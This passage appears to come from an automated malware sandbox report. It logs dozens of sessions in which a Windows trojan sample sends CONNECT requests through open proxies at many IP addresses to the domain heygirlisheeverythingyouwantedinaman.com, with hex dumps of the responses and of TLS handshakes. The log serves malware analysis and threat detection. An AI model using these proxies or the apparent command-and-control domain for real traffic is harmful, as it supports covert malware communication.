                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.462215900 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                351192.168.2.851158202.83.102.8380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.381356955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.706284046 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                352192.168.2.85124347.91.65.2331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.382081985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.850956917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.413475037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.535861969 CET38INHTTP/1.1 200 OK
                                                                                content-length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                353192.168.2.85141749.51.94.124435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.382956982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                354192.168.2.851250174.77.111.19641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.383289099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                355192.168.2.85116960.246.122.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.384922981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.683676004 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.2.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                356192.168.2.85141849.51.94.124435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.385719061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                357192.168.2.85142149.51.94.124435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.387538910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                358192.168.2.85142449.51.94.124435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.389116049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                359192.168.2.851354185.238.228.96805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.400861979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.490959883 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                360192.168.2.851363104.19.225.70805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.411350012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.501483917 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                361192.168.2.851264142.4.7.20341395828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.411355019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.882196903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                362192.168.2.851364104.19.109.209805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.412082911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.502095938 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                363192.168.2.85127998.162.25.2341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.429492950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                364192.168.2.851381162.159.242.104805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.429493904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.516959906 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                365192.168.2.85123231.223.22.2110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.429558992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                366192.168.2.851295141.94.174.6419205828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.434844971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.882430077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                367192.168.2.850761115.96.208.12480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.437776089 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:24.782900095 CET72INHTTP/1.1 200 Connection Established
                                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                368192.168.2.85119252.196.1.182805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.446378946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.755317926 CET196INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: Servlet/2.4
                                                                                Server: Oracle-Application-Server-10g/9.0.4.1.0 Oracle-HTTP-Server
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:24.756151915 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 9d 77 5c f3 2b c8 46 d5 59 05 6e d2 69 56 41 12 e8 b1 59 00 18 15 bd 3e 7d 36 3a c8 ab 3e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ew\+FYniVAY>}6:>*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                Feb 23, 2024 14:28:25.056457043 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 29 28 51 f1 58 5a c0 78 11 c5 a3 65 50 61 45 ae 83 ab 4b ef 75 e1 01 81 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                Data Ascii: =9)(QXZxePaEKuDOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223124521Z260222124521Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                Feb 23, 2024 14:28:25.060662031 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c4 74 1a ca a2 35 2e ac 3f 10 aa 29 36 2b 4f 2d 3a b1 6b 42 36 89 45 12 a0 67 ad 19 2f 22 66 36 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 49 44 0f 5d 39 08 c5 96 a9 c4 76 be 19 30 92 ee 31 ad d6 33 fb
                                                                                Data Ascii: %! t5.?)6+O-:kB6Eg/"f6(ID]9v013z3>_+Jyx
                                                                                Feb 23, 2024 14:28:25.359277964 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 08 c2 e4 f6 38 d6 f4 15 28 28 a3 c3 0f c9 1c 8d c8 05 f9 c0 5c 10 ac 55 2c 96 b2 4e ef 65 e1 cb 03 2f db 6d f1 ca 2d b0
                                                                                Data Ascii: (8((\U,Ne/m-


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                369192.168.2.850768143.255.178.12941535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.473225117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.491835117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.492074966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.491903067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                370192.168.2.851359209.159.153.19190725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.473891973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.641252041 CET24INHTTP/1.1 403 #string


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                371192.168.2.85081898.162.25.4316545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.474123001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                372192.168.2.85083770.166.167.38577285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.474406004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                373192.168.2.850747209.13.186.20805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.474406004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.499174118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.527626038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.556351900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                374192.168.2.850829178.62.229.2831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.474675894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.499165058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.527617931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.556315899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                375192.168.2.851366212.110.188.193344095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.478070974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.929153919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.444753885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.491909981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695061922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.102652073 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                376192.168.2.851167118.91.175.14656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.484911919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                377192.168.2.85137637.59.213.49438405828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.487705946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.868448019 CET24INHTTP/1.1 403 #string


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                378192.168.2.851344109.107.181.245331905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.500381947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.022830009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                379192.168.2.85105168.71.249.153486065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.512171984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                380192.168.2.851401184.178.172.5153035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.514029980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
